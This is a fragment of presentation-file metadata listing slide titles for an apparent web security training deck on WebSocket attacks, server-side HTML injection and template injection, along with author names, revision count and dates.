      <vt:lpstr>WebSockets</vt:lpstr>
      <vt:lpstr>Introduction to WebSockets</vt:lpstr>
      <vt:lpstr>Every Chat App uses WebSockets</vt:lpstr>
      <vt:lpstr>Workflow</vt:lpstr>
      <vt:lpstr>Identify the WebSocket</vt:lpstr>
      <vt:lpstr>HTTP vs WebSockets</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>Mitigations</vt:lpstr>
      <vt:lpstr>Server-Side Template Injection</vt:lpstr>
      <vt:lpstr>Server-Side HTML Injection</vt:lpstr>
      <vt:lpstr>SSHI: PDF Generator Example</vt:lpstr>
      <vt:lpstr>SSHI: Email Form </vt:lpstr>
      <vt:lpstr>Identify the SSHI</vt:lpstr>
      <vt:lpstr>SSHI vs Client-Side HTML Injection</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>Vulnerable Code</vt:lpstr>
      <vt:lpstr>Mitigations</vt:lpstr>
      <vt:lpstr>Server Side Template Injection</vt:lpstr>
      <vt:lpstr>What are Templates ? </vt:lpstr>
      <vt:lpstr>Popular Template Engines</vt:lpstr>
      <vt:lpstr>Example of Template in Modern Apps</vt:lpstr>
      <vt:lpstr>What is SSTI ? </vt:lpstr>
      <vt:lpstr>Identification: The “Decision Tree” Methodology. </vt:lpstr>
      <vt:lpstr>Decision Tree for Template Engines</vt:lpstr>
      <vt:lpstr>Escaping the Sandbox</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>Exploitation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Johri</dc:creator>
  <cp:lastModifiedBy>Yash Mehta</cp:lastModifiedBy>
  <cp:revision>376</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-15T11:15:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-31T03:10:30Z</dcterms:modified>
</cp:coreProperties>
</file>